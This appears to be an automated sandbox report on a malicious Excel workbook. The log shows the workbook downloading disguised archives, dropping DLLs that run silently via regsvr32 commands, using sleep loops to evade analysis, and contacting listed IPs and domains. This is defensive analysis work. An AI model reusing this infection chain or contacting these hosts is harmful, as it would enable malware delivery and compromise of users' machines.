Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Automated click: OK
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/media/image2.png
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/media/image3.png
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings4.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: printouts of outstanding as of 01_20_2021.xlsm Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Registers a DLL
Source: unknown Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zsijkwsd.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\by9zwa7p1[1].zip Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ylztwx[1].rar Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\xkpffwn[1].zip Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\h79fwesfe[1].rar Jump to dropped file
Is looking for software installed on the system
Source: C:\Windows\SysWOW64\regsvr32.exe Registry key enumerated: More than 564 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2488 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -372000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -170000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -297000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -153000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -495000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -246000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -123000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -312000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -121000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -247000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -158000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -155000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -356000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -334000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -146000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -138000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -353000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -296000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -341000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -151000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -164000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -357000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -169000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -147000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -328000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -134000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -162000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -345000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1244 Thread sleep time: -132000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2812 Thread sleep time: -960000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -166000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -132000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -310000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -143000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -178000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -155000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -253000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -120000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -316000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -164000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -312000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -125000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -128000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -167000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -278000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -270000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -291000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -161000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -151000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -252000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -173000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -138000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -146000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2816 Thread sleep time: -293000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1440 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -290000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -135000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -174000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -359000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -175000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -314000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -272000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -142000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -159000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -328000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -132000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -140000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -330000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -166000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -144000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -282000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -179000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -146000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -131000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -353000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -147000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -163000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2036 Thread sleep time: -123000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1340 Thread sleep time: -1080000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -124000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -159000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -167000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -291000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -130000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -262000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -332000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -280000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -163000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -309000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -160000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -147000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -351000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -151000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -168000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -258000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -139000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -161000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -170000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2052 Thread sleep time: -129000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1340 Thread sleep time: -60000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2016 Thread sleep time: -240000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -165000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -133000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -149000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -256000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -143000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -128000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -129000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -299000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -167000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -158000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 972 Thread sleep time: -174000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep count: 55 > 30
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2788 Thread sleep time: -180000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -156000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -140000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -122000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -350000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -145000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1944 Thread sleep time: -144000s >= -30000s

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 198.57.200.100 202
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 69.164.207.140 60
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 211.110.44.63 233
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 194.225.58.214 187
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zsijkwsd.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\ogsit.dll Jump to behavior
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\zlgzuxvz.dll
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000004.00000002.2400095571.00000000008F0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 342170 Sample: printouts of outstanding as... Startdate: 20/01/2021 Architecture: WINDOWS Score: 100 56 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->56 58 Antivirus detection for URL or domain 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 8 other signatures 2->62 7 EXCEL.EXE 244 70 2->7         started        process3 dnsIp4 42 bafnabrotherskesarwala.com 103.11.153.223, 49166, 80 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 7->42 44 salaodigitalautomovel.pt.deve.pt 185.32.190.115, 49181, 80 PTSERVIDORPT Portugal 7->44 46 6 other IPs or domains 7->46 34 C:\Users\user\AppData\Local\...\zsijkwsd.dll, PE32 7->34 dropped 36 C:\Users\user\AppData\Local\...\zlgzuxvz.dll, PE32 7->36 dropped 38 C:\Users\user\AppData\Local\Temp\ogsit.dll, PE32 7->38 dropped 40 5 other malicious files 7->40 dropped 66 Document exploit detected (creates forbidden files) 7->66 68 Document exploit detected (process start blacklist hit) 7->68 70 Document exploit detected (UrlDownloadToFile) 7->70 12 regsvr32.exe 7->12         started        14 regsvr32.exe 7->14         started        16 regsvr32.exe 7->16         started        18 11 other processes 7->18 file5 signatures6 process7 process8 20 regsvr32.exe 12->20         started        23 regsvr32.exe 9 14->23         started        26 regsvr32.exe 11 16->26         started        28 regsvr32.exe 9 18->28         started        30 regsvr32.exe 9 18->30         started        32 regsvr32.exe 18->32         started        dnsIp9 64 System process connects to network (likely due to code injection or exploit) 20->64 48 194.225.58.214, 443, 49170, 49171 TUMS-IR-ASIR Iran (ISLAMIC Republic Of) 23->48 50 198.57.200.100, 3786, 49177, 49180 UNIFIEDLAYER-AS-1US United States 26->50 52 211.110.44.63, 49173, 49174, 49182 SKB-ASSKBroadbandCoLtdKR Korea Republic of 26->52 54 69.164.207.140, 3388, 49175, 49178 LINODE-APLinodeLLCUS United States 26->54 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.32.190.115
 unknown Portugal
62416 PTSERVIDORPT false
85.17.252.207
 unknown Netherlands
60781 LEASEWEB-NL-AMS-01NetherlandsNL false
103.11.153.223
 unknown India
